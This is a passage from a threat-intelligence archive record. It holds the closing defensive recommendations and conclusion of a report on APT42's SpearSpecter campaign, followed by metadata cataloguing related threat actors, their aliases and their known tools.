occurs in memory. Strong\r\nendpoint controls are essential to limiting the attacker's ability to infiltrate and persist in the environment.\r\nConfigure PowerShell to use Constrained Language Mode. Enable AMSI (Antimalware Scan Interface) integration.\r\nEnforce Script Block Logging. 
These measures help defenders detect suspicious PowerShell activity, even when\r\npayloads never touch disk.\r\nDeploy EPM product, AppLocker, or Windows Defender Application Control policies. These reduce the attack\r\nsurface by preventing unapproved binaries, scripts, and LNK files from running.\r\nConclusion\r\nThe SpearSpecter campaign demonstrates how APT42 is employing targeted social engineering, combined with a\r\nmodular PowerShell backdoor, to obtain data of interest to the IRGC.\r\nThe campaign, with its new TTPs, infrastructure, and TAMECAT modules, demonstrates that the threat actor\r\ncontinues to refine its toolset to achieve its operational goals and stay under the radar for as long as possible.\r\nAPT42, operating in the interests of the Islamic Revolutionary Guard Corps, plays a pivotal role in Iran's\r\nintelligence-gathering efforts, specifically targeting individuals who may possess data of interest to the Islamic\r\nRevolutionary Guard Corps.\r\nSource: https://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 48 of 48",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/"
	],
	"report_names": [
		"spearspecter"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1",
			"created_at": "2023-03-04T02:01:54.091301Z",
			"updated_at": "2026-04-10T02:00:03.356317Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"UNC788",
				"CALANQUE"
			],
			"source_name": "MISPGALAXY:APT42",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8",
			"created_at": "2025-04-23T02:00:55.275208Z",
			"updated_at": "2026-04-10T02:00:05.270553Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"APT42"
			],
			"source_name": "MITRE:APT42",
			"tools": [
				"NICECURL",
				"TAMECAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1efe328c-7bda-49d8-82bf-852d220110ae",
			"created_at": "2026-01-22T02:00:03.661882Z",
			"updated_at": "2026-04-10T02:00:03.917703Z",
			"deleted_at": null,
			"main_name": "Educated Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Educated Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434699,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/686b64604331d09ecd155ffe6a379958f2d87b32.pdf",
		"text": "https://archive.orkl.eu/686b64604331d09ecd155ffe6a379958f2d87b32.txt",
		"img": "https://archive.orkl.eu/686b64604331d09ecd155ffe6a379958f2d87b32.jpg"
	}
}